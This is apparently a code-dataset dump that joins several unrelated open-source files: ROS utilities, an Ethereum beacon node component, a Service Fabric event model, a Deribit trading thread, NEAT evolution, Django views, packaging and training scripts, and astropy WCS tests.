atexit.register(_ros_atexit)
# #687
def register_signals():
"""
register system signal handlers for SIGTERM and SIGINT
"""
_signalChain[signal.SIGTERM] = signal.signal(signal.SIGTERM, _ros_signal)
_signalChain[signal.SIGINT] = signal.signal(signal.SIGINT, _ros_signal)
# Validators ######################################
def is_topic(param_name):
"""
Validator that checks that parameter is a valid ROS topic name
"""
def validator(param_value, caller_id):
v = valid_name_validator_resolved(param_name, param_value, caller_id)
if param_value == '/':
raise ParameterInvalid("ERROR: parameter [%s] cannot be the global namespace"%param_name)
return v
return validator
def xmlrpcapi(uri):
"""
@return: instance for calling remote server or None if not a valid URI
@rtype: xmlrpclib.ServerProxy
"""
if uri is None:
return None
uriValidate = urlparse.urlparse(uri)
if not uriValidate[0] or not uriValidate[1]:
return None
return xmlrpcclient.ServerProxy(uri)
|
the-stack_106_12966
|
from argparse import ArgumentParser, _SubParsersAction
import asyncio
import logging
from typing import Set, Tuple
from async_exit_stack import AsyncExitStack
from lahja import EndpointAPI
from libp2p.crypto.keys import KeyPair
from libp2p.crypto.secp256k1 import create_new_key_pair
from eth2.beacon.typing import SubnetId
from p2p.service import BaseService, run_service
from trinity.boot_info import BootInfo
from trinity.config import BeaconAppConfig, TrinityConfig
from trinity.db.beacon.chain import AsyncBeaconChainDB
from trinity.db.manager import DBClient
from trinity.extensibility import AsyncioIsolatedComponent
from trinity.http.apps.validator_api import ValidatorAPIHandler
from trinity.http.handlers.api_handler import APIHandler
from trinity.http.handlers.metrics_handler import MetricsHandler
from trinity.http.main import HTTPServer
from trinity.http.server import HTTPServer as HTTPAppServer
from trinity.protocol.bcc_libp2p.configs import ATTESTATION_SUBNET_COUNT
from trinity.protocol.bcc_libp2p.node import Node
from trinity.protocol.bcc_libp2p.servers import BCCReceiveServer
from trinity.sync.beacon.chain import BeaconChainSyncer
from trinity.sync.common.chain import SyncBlockImporter
from .chain_maintainer import ChainMaintainer
from .slot_ticker import SlotTicker
from .validator_handler import ValidatorHandler
def _load_secp256k1_key_pair_from(trinity_config: TrinityConfig) -> KeyPair:
return create_new_key_pair(trinity_config.nodekey.to_bytes())
class BeaconNodeComponent(AsyncioIsolatedComponent):
name = "Beacon Node"
logger = logging.getLogger("trinity.components.beacon.BeaconNode")
@classmethod
def configure_parser(
cls, arg_parser: ArgumentParser, subparser: _SubParsersAction
) -> None:
arg_parser.add_argument(
"--enable-metrics", action="store_true", help="Enables the Metrics Server"
)
arg_parser.add_argument(
"--metrics-port", type=int, help="Metrics server port", default=8008
)
arg_parser.add_argument(
"--debug-libp2p", action="store_true", help="Enable debug logging of libp2p"
)
arg_parser.add_argument(
"--enable-api", action="store_true", help="Enables the API Server"
)
arg_parser.add_argument(
"--api-port", type=int, help="API server port", default=5005
)
arg_parser.add_argument(
"--bn-only", action="store_true", help="Run with BeaconNode only mode"
)
@property
def is_enabled(self) -> bool:
return self._boot_info.trinity_config.has_app_config(BeaconAppConfig)
@classmethod
async def do_run(cls, boot_info: BootInfo, event_bus: EndpointAPI) -> None:
trinity_config = boot_info.trinity_config
key_pair = _load_secp256k1_key_pair_from(trinity_config)
beacon_app_config = trinity_config.get_app_config(BeaconAppConfig)
base_db = DBClient.connect(trinity_config.database_ipc_path)
if boot_info.args.debug_libp2p:
logging.getLogger("libp2p").setLevel(logging.DEBUG)
else:
logging.getLogger("libp2p").setLevel(logging.INFO)
with base_db:
chain_config = beacon_app_config.get_chain_config()
chain = chain_config.beacon_chain_class(
base_db, chain_config.genesis_config
)
# TODO: To simplify, subsribe all subnets
subnets: Set[SubnetId] = set(
SubnetId(subnet_id) for subnet_id in range(ATTESTATION_SUBNET_COUNT)
)
# TODO: Handle `bootstrap_nodes`.
libp2p_node = Node(
key_pair=key_pair,
listen_ip="0.0.0.0",
listen_port=boot_info.args.port,
preferred_nodes=trinity_config.preferred_nodes,
chain=chain,
subnets=subnets,
event_bus=event_bus,
)
receive_server = BCCReceiveServer(
chain=chain,
p2p_node=libp2p_node,
topic_msg_queues=libp2p_node.pubsub.my_topics,
subnets=subnets,
cancel_token=libp2p_node.cancel_token,
)
chain_maintainer = ChainMaintainer(
chain=chain, event_bus=event_bus, token=libp2p_node.cancel_token
)
validator_handler = ValidatorHandler(
chain=chain,
p2p_node=libp2p_node,
event_bus=event_bus,
get_ready_attestations_fn=receive_server.get_ready_attestations,
get_aggregatable_attestations_fn=receive_server.get_aggregatable_attestations,
import_attestation_fn=receive_server.import_attestation,
token=libp2p_node.cancel_token,
)
slot_ticker = SlotTicker(
genesis_slot=chain_config.genesis_config.GENESIS_SLOT,
genesis_time=chain_config.genesis_time,
seconds_per_slot=chain_config.genesis_config.SECONDS_PER_SLOT,
event_bus=event_bus,
token=libp2p_node.cancel_token,
)
syncer = BeaconChainSyncer(
chain_db=AsyncBeaconChainDB(base_db, chain_config.genesis_config),
peer_pool=libp2p_node.handshaked_peers,
block_importer=SyncBlockImporter(chain),
genesis_config=chain_config.genesis_config,
event_bus=event_bus,
token=libp2p_node.cancel_token,
)
metrics_server = HTTPServer(
handler=MetricsHandler.handle(chain)(event_bus),
port=boot_info.args.metrics_port,
)
# NOTE: this API server provides an interface into the beacon node
api_server = HTTPServer(
handler=APIHandler.handle(chain)(event_bus),
port=boot_info.args.api_port,
)
# NOTE: this API server provides an interface between the beacon node and
# any connected validator clients.
validator_api_handler = ValidatorAPIHandler(
chain, event_bus, chain_config.genesis_time
)
validator_api_server = HTTPAppServer(
routes=validator_api_handler.make_routes(), port=30303
)
services: Tuple[BaseService, ...] = (
libp2p_node,
receive_server,
slot_ticker,
syncer,
validator_api_server,
)
if boot_info.args.enable_metrics:
services += (metrics_server,)
if boot_info.args.enable_api:
services += (api_server,)
if boot_info.args.bn_only:
services += (chain_maintainer, validator_handler)
async with AsyncExitStack() as stack:
for service in services:
await stack.enter_async_context(run_service(service))
await asyncio.gather(*(service.cancellation() for service in services))
|
the-stack_106_12967
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .node_event import NodeEvent
class NodeRemovedFromClusterEvent(NodeEvent):
"""Node Removed event.
:param event_instance_id: The identifier for the FabricEvent instance.
:type event_instance_id: str
:param category: The category of event.
:type category: str
:param time_stamp: The time event was logged.
:type time_stamp: datetime
:param has_correlated_events: Shows there is existing related events
available.
:type has_correlated_events: bool
:param kind: Constant filled by server.
:type kind: str
:param node_name: The name of a Service Fabric node.
:type node_name: str
:param node_id: Id of Node.
:type node_id: str
:param node_instance: Id of Node instance.
:type node_instance: long
:param node_type: Type of Node.
:type node_type: str
:param fabric_version: Fabric version.
:type fabric_version: str
:param ip_address_or_fqdn: IP address or FQDN.
:type ip_address_or_fqdn: str
:param node_capacities: Capacities.
:type node_capacities: str
"""
_validation = {
'event_instance_id': {'required': True},
'time_stamp': {'required': True},
'kind': {'required': True},
'node_name': {'required': True},
'node_id': {'required': True},
'node_instance': {'required': True},
'node_type': {'required': True},
'fabric_version': {'required': True},
'ip_address_or_fqdn': {'required': True},
'node_capacities': {'required': True},
}
_attribute_map = {
'event_instance_id': {'key': 'EventInstanceId', 'type': 'str'},
'category': {'key': 'Category', 'type': 'str'},
'time_stamp': {'key': 'TimeStamp', 'type': 'iso-8601'},
'has_correlated_events': {'key': 'HasCorrelatedEvents', 'type': 'bool'},
'kind': {'key': 'Kind', 'type': 'str'},
'node_name': {'key': 'NodeName', 'type': 'str'},
'node_id': {'key': 'NodeId', 'type': 'str'},
'node_instance': {'key': 'NodeInstance', 'type': 'long'},
'node_type': {'key': 'NodeType', 'type': 'str'},
'fabric_version': {'key': 'FabricVersion', 'type': 'str'},
'ip_address_or_fqdn': {'key': 'IpAddressOrFQDN', 'type': 'str'},
'node_capacities': {'key': 'NodeCapacities', 'type': 'str'},
}
def __init__(self, event_instance_id, time_stamp, node_name, node_id, node_instance, node_type, fabric_version, ip_address_or_fqdn, node_capacities, category=None, has_correlated_events=None):
super(NodeRemovedFromClusterEvent, self).__init__(event_instance_id=event_instance_id, category=category, time_stamp=time_stamp, has_correlated_events=has_correlated_events, node_name=node_name)
self.node_id = node_id
self.node_instance = node_instance
self.node_type = node_type
self.fabric_version = fabric_version
self.ip_address_or_fqdn = ip_address_or_fqdn
self.node_capacities = node_capacities
self.kind = 'NodeRemovedFromCluster'
|
the-stack_106_12973
|
from PyQt5 import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from deritradeterminal.util.deribit_api import RestClient
from deritradeterminal.managers.ConfigManager import ConfigManager
class ScalpSellThread(QThread):
signeler = pyqtSignal(bool,str,str)
def processOrder(self):
try:
config = ConfigManager.get_config()
client = RestClient(config.tradeApis[self.accountid][0], config.tradeApis[self.accountid][1], ConfigManager.get_config().apiUrl)
client.sell(ConfigManager.get_config().tradeInsturment, float(self.amount), self.price)
self.signeler.emit(True, "Scalp Sell Order Success", "Scalp Sell On Account: " + str(self.accountid) + " For Amount: " + str(self.amount) + " At Price: " + str(self.price))
except Exception as e:
self.signeler.emit(False, "Scalp Sell Order Error" , "Failed to scalp sell on " + str(self.accountid) + " for amount: " + str(self.amount) + "\n" + str(e))
def __init__(self, accountid, price, amount):
QThread.__init__(self)
self.accountid = accountid
self.price = price
self.amount = amount
def run(self):
self.processOrder()
|
the-stack_106_12976
|
from dinosaur.utils.data import Data
import random
from dinosaur.neat.network import Network
from dinosaur.neat.network import Gene
from dinosaur.utils import math_helper
# --- Fitness Evaluation ---
# returns the player with the highest fitness
def best_player():
fitnesses = [p.fitness for p in Data.players]
max_f = max(fitnesses)
max_is = [i for i in range(len(fitnesses)) if fitnesses[i] == max_f]
if len(max_is) == 0:
return None
else:
return Data.players[max_is[0]]
# returns the average fitness of a given species
def avg_fitness(specy):
fit_sum = 0.
for (_, f) in specy:
fit_sum += f
return fit_sum / len(specy)
# returns the average fitness of all species
def total_avg_fitness(species):
sum = 0.
for specy in species:
sum += avg_fitness(specy)
return sum
# returns the desired amount of children to be created from a certain species, depending on the average fitness of
# all species
def offspring_count(specy, total_avg_fit):
return int(avg_fitness(specy) / total_avg_fit * Data.population_size)
# --- Network Differences ---
# for given networks n1 and n2, returns the excess genes of either n1 or n2 in relation to the other,
# depending on which network has the higher maximum innovation number in its genes, and indicates which one that is
def excess_genes(n1, n2):
if len(n1.genes) == 0:
return n2.genes, False
elif len(n2.genes) == 0:
return n1.genes, True
max_inno_nr_1 = max([g.innovation_number for g in n1.genes])
max_inno_nr_2 = max([g.innovation_number for g in n2.genes])
if max_inno_nr_1 < max_inno_nr_2:
first_has_excess = False
ex_genes = [g for g in n2.genes if g.innovation_number > max_inno_nr_1]
else:
first_has_excess = True
ex_genes = [g for g in n1.genes if g.innovation_number > max_inno_nr_2]
return ex_genes, first_has_excess
# returns the genes of given networks n1 and n2 that don't match the other one's
def disjoint_genes(n1, n2):
if len(n1.genes) == 0 or len(n2.genes) == 0:
return [], []
innos_1 = [g.innovation_number for g in n1.genes]
innos_2 = [g.innovation_number for g in n2.genes]
limit = min(max(innos_1), max(innos_2))
dis_genes_1 = [g for g in n1.genes if g.innovation_number <= limit and g.innovation_number not in innos_2]
dis_genes_2 = [g for g in n2.genes if g.innovation_number <= limit and g.innovation_number not in innos_1]
return dis_genes_1, dis_genes_2
# finds all pairs of matching genes across two networks n1 and n2 and for each pair randomly selects one of the two
# returns the result
def random_matching_genes(n1, n2):
matching_genes = []
for g1 in n1.genes:
m_genes = [g2 for g2 in n2.genes if g1.innovation_number == g2.innovation_number]
if len(m_genes) > 0:
random_i = random.randint(0, 1)
matching_genes.append([g1, m_genes[0]][random_i])
return matching_genes
# returns the difference between two networks based on their excess and disjoint genes and their average weights
def network_dif(n1, n2):
max_size = float(max(len(n1.genes), len(n2.genes)))
if max_size == 0:
return 0.
(ex_genes, _) = excess_genes(n1, n2)
(d_genes_1, d_genes_2) = disjoint_genes(n1, n2)
return Data.excess_weight * len(ex_genes) / max_size + Data.disjoint_weight * (len(d_genes_1)
+ len(d_genes_2)) / max_size + Data.weight_dif_weight * abs((n1.avg_weight() - n2.avg_weight()))
# --- Mutation ---
# performs NEAT evolution on a given set of networks and returns the result
def evolve(nets):
if len(nets) == 0:
print("No networks passed for evolving. Is this intentional?")
return nets
# speciation
species = []
for (net, fitness) in nets:
for specy in species:
(rep, _) = specy[0] # should just fail bluntly if there's no networks in the species
if network_dif(net, rep) <= Data.speciation_threshold:
specy.append((net, fitness))
break
else:
species.append([(net, fitness)])
# cut off the worst half of all species
new_species = []
for specy in species:
cap_index = (len(specy) + 1) // 2
new_specy = sorted(specy, key=lambda af: af[1], reverse=True)[:cap_index]
new_species.append(new_specy)
species = new_species
# remove weak species
new_species = []
total_avg_fit = total_avg_fitness(species)
for specy in species:
if offspring_count(specy, total_avg_fit) >= 1:
new_species.append(specy)
species = new_species
# breed within each species
children = []
total_avg_fit = total_avg_fitness(species)
for specy in species:
off_count = offspring_count(specy, total_avg_fit) - 1
for _ in range(off_count):
children.append(breed(specy))
# randomly add the best of each species until there are enough
while len(children) < Data.population_size - len(species):
(c, _) = random.choice(species)[0]
children.append(c)
# mutate and add unadulterated parents
new_population = mutate(children)
for specy in species:
(c, _) = specy[0]
new_population.append(c)
return new_population
# performs mutation on a given set of networks and keeps track of the innovation numbers used and created in the process
def mutate(nets):
add_gene_mutations = [] # (in neuron, out neuron, innovation nr)
add_neuron_mutations = [] # (in neuron, out neuron, innovation nr in, innovation nr out)
for net in nets:
for gene in net.genes:
if math_helper.random_decision(Data.prob_weight_mut):
if math_helper.random_decision(Data.prob_weight_nudged):
gene.weight = math_helper.sigmoid_weight(gene.weight
+ random.uniform(-Data.weight_nudge_limit, Data.weight_nudge_limit))
else:
gene.weight = random.uniform(-1., 1.)
add_neuron = math_helper.random_decision(Data.prob_new_neuron)
add_gene = math_helper.random_decision(Data.prob_new_gene)
if add_gene:
if not add_neuron:
(in_n, out_n) = net.new_gene_neurons()
weight = random.uniform(-1., 1.)
prev_similar_innovations = [p_inno_nr for (p_in_n, p_out_n, p_inno_nr) in add_gene_mutations
if p_in_n == in_n and p_out_n == out_n]
if len(prev_similar_innovations) > 0:
innovation_number = prev_similar_innovations[0]
else:
Data.current_innovation_number += 1
innovation_number = Data.current_innovation_number
add_gene_mutations.append((in_n, out_n, innovation_number))
net.genes.append(Gene(in_n=in_n, out_n=out_n, weight=weight, enabled=True,
innovation_number=innovation_number))
else:
if add_neuron and len(net.genes) > 0:
split_gene = random.choice(net.genes)
split_gene.enabled = False
new_neuron_number = max(net.all_neurons) + 1
prev_similar_innovations = [(p_inno_nr_in, p_inno_nr_out)
for (p_in_n, p_out_n, p_inno_nr_in, p_inno_nr_out) in add_neuron_mutations
if p_in_n == split_gene.in_n and p_out_n == split_gene.out_n]
if len(prev_similar_innovations) > 0:
(innovation_number_in, innovation_number_out) = prev_similar_innovations[0]
else:
Data.current_innovation_number += 1
innovation_number_in = Data.current_innovation_number
Data.current_innovation_number += 1
innovation_number_out = Data.current_innovation_number
net.genes.append(Gene(in_n=split_gene.in_n, out_n=new_neuron_number, weight=random.uniform(-1., 1.),
enabled=True, innovation_number=innovation_number_in))
net.genes.append(Gene(in_n=new_neuron_number, out_n=split_gene.out_n, weight=random.uniform(-1., 1.),
enabled=True, innovation_number=innovation_number_out))
net.refresh_neuron_list()
return nets
# --- Reproduction ---
# creates a child from within a species, either through crossover or through simple replication
def breed(specy):
if math_helper.random_decision(Data.prob_crossover):
(n1, _) = random.choice(specy)
(n2, _) = random.choice(specy)
return produce_child(n1, n2)
else:
(n, _) = random.choice(specy)
return n.replicate()
# creates a child from two given networks
def produce_child(n1, n2):
child_genes = random_matching_genes(n1, n2)
(dis_genes_1, _) = disjoint_genes(n1, n2)
(ex_genes, first_has_excess) = excess_genes(n1, n2)
child_genes.extend(dis_genes_1)
if first_has_excess:
child_genes.extend(ex_genes)
return Network(child_genes, n1.add_ins, n1.add_outs)
|
the-stack_106_12977
|
from __future__ import unicode_literals
from django.shortcuts import redirect
from django.utils.translation import ugettext_lazy as _
from django.views.generic.edit import FormView
from django.http.response import HttpResponse
from django.views.generic.base import TemplateView
from easydata.category.models import category
from easydata.category.forms import CategoryPostForm
from easydata.func.function_session import initial_form_session_for_custom_field,\
clear_form_session
from easydata.func.function_category import get_category_fid_choices_html,\
get_category_list_html
from easydata.func.function_core import check_login, get_add_icon
from django.contrib import messages
from easydata.constant import HOME_BREAD
from easydata.validator import IntegerValidator
class CategoryPostView(FormView):
template_name = 'category/post.html'
form_class = CategoryPostForm
action = 'new'
category_instance = None
custom_field_css = None
custom_field_errors = []
def __init__(self, *args, **kwargs):
self.breadcrumb = [HOME_BREAD,{'text': _('Category'), 'href': '/category/list/'},]
super(CategoryPostView, self).__init__(*args, **kwargs)
def get(self, *args, **kwargs):
if not check_login(self.request) or self.request.user.is_superuser != True:
return redirect("/account/login/?next=%s" % self.request.get_full_path())
if 'pk' in self.kwargs and self.kwargs['pk'].isdigit():
self.action = 'edit'
self.category_instance = category.objects.get(pk=self.kwargs['pk'])
return super(CategoryPostView, self).get(*args, **kwargs)
def get_initial(self):
initial = super(CategoryPostView, self).get_initial()
if self.action == 'edit':
initial["name"] = self.category_instance.name
CategoryPostForm.fid_choice_html = get_category_fid_choices_html(self.category_instance.fid)
initial["description"] = self.category_instance.description
initial["ctype"] = self.category_instance.ctype
initial["displayorder"] = self.category_instance.displayorder
initial["status"] = self.category_instance.status
else:
CategoryPostForm.fid_choice_html = get_category_fid_choices_html()
return initial
def get_context_data(self, **kwargs):
context = super(CategoryPostView, self).get_context_data(**kwargs)
if self.action == 'edit':
context['head_title_text'] = _('Category Edit')
context['legend_text'] = _('Category Edit')
self.breadcrumb.append({'text': 'Edit'})
else:
context['head_title_text'] = _('New Category')
context['legend_text'] = _('New Category')
self.breadcrumb.append({'text': 'Create'})
context['breadcrumb'] = self.breadcrumb
initial_form_session_for_custom_field(context['form'], self.request.session)
return context
def post(self, *args, **kwargs):
if not check_login(self.request) or self.request.user.is_superuser != True:
return redirect("/account/login/?next=%s" % self.request.get_full_path())
if 'pk' in self.kwargs and self.kwargs['pk'].isdigit():
self.action = 'edit'
self.category_instance = category.objects.get(pk=self.kwargs['pk'])
return super(CategoryPostView, self).post(*args, **kwargs)
def form_valid(self, form):
if not check_login(self.request) or self.request.user.is_superuser != True:
return redirect("/account/login/")
else:
#validate fid
fid_validator = IntegerValidator(validate_key='fid',
validate_label='father category id',
session=self.request.session,
post=self.request.POST)
fid_validate_result = fid_validator.check()
if fid_validate_result:
cleaned_fid = fid_validator.get_value()
clear_form_session(self.request.session)
else:
self.request.session.modified = True
return redirect(self.request.path)
if self.action == 'new':
cate = category()
cate.fid = cleaned_fid
cate.name = form.cleaned_data.get("name")
cate.description = form.cleaned_data.get("description")
cate.status = form.cleaned_data.get("status")
cate.displayorder = form.cleaned_data.get("displayorder")
cate.ctype = form.cleaned_data.get("ctype")
cate.save()
message_body = _('category is successfully created')
else:
self.category_instance.fid = cleaned_fid
self.category_instance.name = form.cleaned_data.get("name")
self.category_instance.description = form.cleaned_data.get("description")
self.category_instance.status = form.cleaned_data.get("status")
self.category_instance.displayorder = form.cleaned_data.get("displayorder")
self.category_instance.ctype = form.cleaned_data.get("ctype")
self.category_instance.save()
message_body = _('category has been successfully modified')
messages.success(self.request, message_body)
return redirect('/category/list/')
class CategoryListView(TemplateView):
model = category
template_name = 'category/list.html'
def __init__(self, *args, **kwargs):
self.breadcrumb = [HOME_BREAD,{'text': _('Category')},get_add_icon('/category/new/',_('Create a new category'))]
super(CategoryListView, self).__init__(*args, **kwargs)
def get(self, *args, **kwargs):
if not check_login(self.request) or self.request.user.is_superuser != True:
return redirect("/account/login/?next=%s" % self.request.get_full_path())
return super(CategoryListView, self).get(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(CategoryListView, self).get_context_data(**kwargs)
context['category_list_html'] = get_category_list_html()
context['head_title_text'] = _('Category List')
context['breadcrumb'] = self.breadcrumb
return context
def delete_category(request, pk):
cate = category.objects.get(pk=pk)
if not check_login(request) or request.user.is_superuser != True:
return redirect("/account/login/?next=%s" % request.get_full_path())
cate.delete()
message_body = "The category %s has been deleted" % cate.name
messages.success(request, message_body)
return HttpResponse('')
|
the-stack_106_12978
|
"""
nbconvert_md_processing
Postprocessing of markdown files resulting from
"""
import sys
from setuptools import setup, find_packages
import versioneer
short_description = ("Postprocessing of markdown files resulting from jupyter nbconvert"
" to be uploaded to github (gists).")
# from https://github.com/pytest-dev/pytest-runner#conditional-requirement
needs_pytest = {'pytest', 'test', 'ptr'}.intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
try:
with open("README.md", "r") as handle:
long_description = handle.read()
except:
long_description = None
setup(
# Self-descriptive entries which should always be present
name='nbconvert_md_processing',
author='enryh',
author_email='[email protected]',
description=short_description,
long_description=long_description,
long_description_content_type="text/markdown",
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
license='MIT',
# Which Python importable modules should be included when your package is installed
# Handled automatically by setuptools. Use 'exclude' to prevent some specific
# subpackage(s) from being added, if needed
packages=find_packages(),
# Optional include package data to ship with your package
# Customize MANIFEST.in if the general case does not suit your needs
# Comment out this line to prevent the files from being packaged with your software
include_package_data=True,
# Allows `setup.py test` to work correctly with pytest
setup_requires=[] + pytest_runner,
# Entry point
entry_points = {
'console_scripts': ['nbconvert_md_processing=nbconvert_md_processing.nbconvert_md_processing:main'],
},
# Additional entries you may want simply uncomment the lines you want and fill in the data
# url='http://www.my_package.com', # Website
# install_requires=[], # Required packages, pulls from pip if needed; do not use for Conda deployment
# platforms=['Linux',
# 'Mac OS-X',
# 'Unix',
# 'Windows'], # Valid platforms your code works on, adjust to your flavor
python_requires=">=3.8", # Python version restrictions
# Manual control if final package is compressible or not, set False to prevent the .egg from being made
# zip_safe=False,
)
|
the-stack_106_12981
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from copy import deepcopy
import numpy as np
import pytest
from astropy import units as u
from astropy.coordinates import FK5, Galactic, SkyCoord
from astropy.wcs import WCS
from astropy.wcs.utils import pixel_to_skycoord, skycoord_to_pixel
from numpy.testing import assert_allclose, assert_equal
from ..wcs_helpers import find_optimal_celestial_wcs
try:
import shapely # noqa
except ImportError:
SHAPELY_INSTALLED = False
else:
SHAPELY_INSTALLED = True
class TestOptimalWCS():
def setup_method(self, method):
self.wcs = WCS(naxis=2)
self.wcs.wcs.ctype = 'RA---TAN', 'DEC--TAN'
self.wcs.wcs.crpix = 10, 15
self.wcs.wcs.crval = 43, 23
self.wcs.wcs.cdelt = -0.1, 0.1
self.wcs.wcs.equinox = 2000.
self.array = np.ones((30, 40))
def test_identity(self):
wcs, shape = find_optimal_celestial_wcs([(self.array, self.wcs)], frame=FK5())
assert tuple(wcs.wcs.ctype) == ('RA---TAN', 'DEC--TAN')
assert_allclose(wcs.wcs.crval, (43, 23))
assert_allclose(wcs.wcs.cdelt, (-0.1, 0.1))
assert wcs.wcs.equinox == 2000
assert wcs.wcs.radesys == 'FK5'
assert_allclose(wcs.wcs.crpix, (10, 15))
assert shape == (30, 40)
def test_args_tuple_wcs(self):
wcs, shape = find_optimal_celestial_wcs([(self.array.shape, self.wcs)], frame=FK5())
def test_args_tuple_header(self):
wcs, shape = find_optimal_celestial_wcs([(self.array.shape, self.wcs.to_header())],
frame=FK5())
def test_frame_projection(self):
wcs, shape = find_optimal_celestial_wcs([(self.array, self.wcs)], frame=Galactic(),
projection='CAR')
assert tuple(wcs.wcs.ctype) == ('GLON-CAR', 'GLAT-CAR')
c = SkyCoord(43, 23, unit=('deg', 'deg'), frame='fk5').galactic
assert_allclose(wcs.wcs.crval, (c.l.degree, c.b.degree))
assert_allclose(wcs.wcs.cdelt, (-0.1, 0.1))
assert np.isnan(wcs.wcs.equinox)
assert wcs.wcs.radesys == ''
# The following values are empirical and just to make sure there are no regressions
assert_allclose(wcs.wcs.crpix, (16.21218937, 28.86119519))
assert shape == (47, 50)
def test_frame_str(self):
wcs, shape = find_optimal_celestial_wcs([(self.array, self.wcs)], frame='galactic')
assert tuple(wcs.wcs.ctype) == ('GLON-TAN', 'GLAT-TAN')
def test_resolution(self):
wcs, shape = find_optimal_celestial_wcs([(self.array, self.wcs)], resolution=3 * u.arcmin)
assert_allclose(wcs.wcs.cdelt, (-0.05, 0.05))
@pytest.mark.skipif('not SHAPELY_INSTALLED')
def test_auto_rotate(self):
# To test auto_rotate, we set the frame to Galactic and the final image
# should have the same size as the input image. In this case, the image
# actually gets rotated 90 degrees, so the values aren't quite the same
# as the input, but they are round values.
wcs, shape = find_optimal_celestial_wcs([(self.array, self.wcs)],
frame=Galactic(), auto_rotate=True)
assert tuple(wcs.wcs.ctype) == ('GLON-TAN', 'GLAT-TAN')
c = SkyCoord(43, 23, unit=('deg', 'deg'), frame='fk5').galactic
assert_allclose(wcs.wcs.crval, (c.l.degree, c.b.degree))
assert_allclose(wcs.wcs.cdelt, (-0.1, 0.1))
assert np.isnan(wcs.wcs.equinox)
assert wcs.wcs.radesys == ''
assert_allclose(wcs.wcs.crpix, (10, 15))
assert shape == (30, 40)
@pytest.mark.skipif('not SHAPELY_INSTALLED')
@pytest.mark.parametrize('angle', np.linspace(0, 360, 13))
def test_auto_rotate_systematic(self, angle):
# This is a test to make sure for a number of angles that the corners
# of the image are inside the final WCS but the next pixels outwards are
# not. We test the full 360 range of angles.
angle = np.radians(angle)
pc = np.array([[np.cos(angle), -np.sin(angle)],
[np.sin(angle), np.cos(angle)]])
self.wcs.wcs.pc = pc
wcs, shape = find_optimal_celestial_wcs([(self.array, self.wcs)], auto_rotate=True)
ny, nx = self.array.shape
xp = np.array([0, 0, nx - 1, nx - 1, -1, -1, nx, nx])
yp = np.array([0, ny - 1, ny - 1, 0, -1, ny, ny, -1])
c = pixel_to_skycoord(xp, yp, self.wcs, origin=0)
xp_final, yp_final = skycoord_to_pixel(c, wcs, origin=0)
ny_final, nx_final = shape
inside = ((xp_final >= -0.5) & (xp_final <= nx_final - 0.5) &
(yp_final >= -0.5) & (yp_final <= ny_final - 0.5))
assert_equal(inside, [1, 1, 1, 1, 0, 0, 0, 0])
def test_multiple_size(self):
wcs1 = self.wcs
wcs2 = deepcopy(self.wcs)
wcs2.wcs.crpix[0] += 10
wcs3 = deepcopy(self.wcs)
wcs3.wcs.crpix[1] -= 5
input_data = [(self.array, wcs1), (self.array, wcs2), (self.array, wcs3)]
wcs, shape = find_optimal_celestial_wcs(input_data, frame=FK5())
assert tuple(wcs.wcs.ctype) == ('RA---TAN', 'DEC--TAN')
assert_allclose(wcs.wcs.crval, (43, 23))
assert_allclose(wcs.wcs.cdelt, (-0.1, 0.1))
assert wcs.wcs.equinox == 2000
assert wcs.wcs.radesys == 'FK5'
assert_allclose(wcs.wcs.crpix, (20, 15))
assert shape == (35, 50)
def test_multiple_resolution(self):
wcs1 = self.wcs
wcs2 = deepcopy(self.wcs)
wcs2.wcs.cdelt = -0.01, 0.02
wcs3 = deepcopy(self.wcs)
wcs3.wcs.crpix = -0.2, 0.3
input_data = [(self.array, wcs1), (self.array, wcs2), (self.array, wcs3)]
wcs, shape = find_optimal_celestial_wcs(input_data)
assert_allclose(wcs.wcs.cdelt, (-0.01, 0.01))
def test_invalid_array_shape(self):
array = np.ones((30, 20, 10))
with pytest.raises(ValueError) as exc:
wcs, shape = find_optimal_celestial_wcs([(array, self.wcs)])
assert exc.value.args[0] == 'Input data is not 2-dimensional (got shape (30, 20, 10))'
def test_invalid_wcs_shape(self):
wcs = WCS(naxis=3)
wcs.wcs.ctype = 'RA---TAN', 'DEC--TAN', 'VELO-LSR'
wcs.wcs.set()
with pytest.raises(ValueError) as exc:
wcs, shape = find_optimal_celestial_wcs([(self.array, wcs)])
assert exc.value.args[0] == 'Input WCS is not 2-dimensional'
def test_invalid_not_celestial(self):
self.wcs.wcs.ctype = 'OFFSETX', 'OFFSETY'
with pytest.raises(TypeError) as exc:
wcs, shape = find_optimal_celestial_wcs([(self.array, self.wcs)])
assert exc.value.args[0] == 'WCS does not have celestial components'
|
the-stack_106_12986
|
# %%
import pickle
# %%
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
# %% tags=["parameters"]
upstream = ['features']
product = None
model_type = 'random-forest'
n_estimators = None
criterion = None
learning_rate = None
# %%
df = pd.read_csv(str(upstream['features']))
X = df.drop('target', axis='columns')
y = df.target
# %%
X_train, X_test, y_train, y_test = train_test_split(X,
y,
test_size=0.33,
random_state=42)
# %%
if model_type == 'random-forest':
clf = RandomForestClassifier(n_estimators=n_estimators,
criterion=criterion)
elif model_type == 'ada-boost':
clf = AdaBoostClassifier(n_estimators=n_estimators,
learning_rate=learning_rate)
else:
raise ValueError(f'Unsupported model type: {model_type!r}')
# %%
clf.fit(X_train, y_train)
# %%
y_pred = clf.predict(X_test)
# %%
print(classification_report(y_test, y_pred))
# %%
with open(product['model'], 'wb') as f:
pickle.dump(clf, f)
|
the-stack_106_12989
|
"""SCons.Scanner.D
Scanner for the Digital Mars "D" programming language.
Coded by Andy Friesen
17 Nov 2003
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
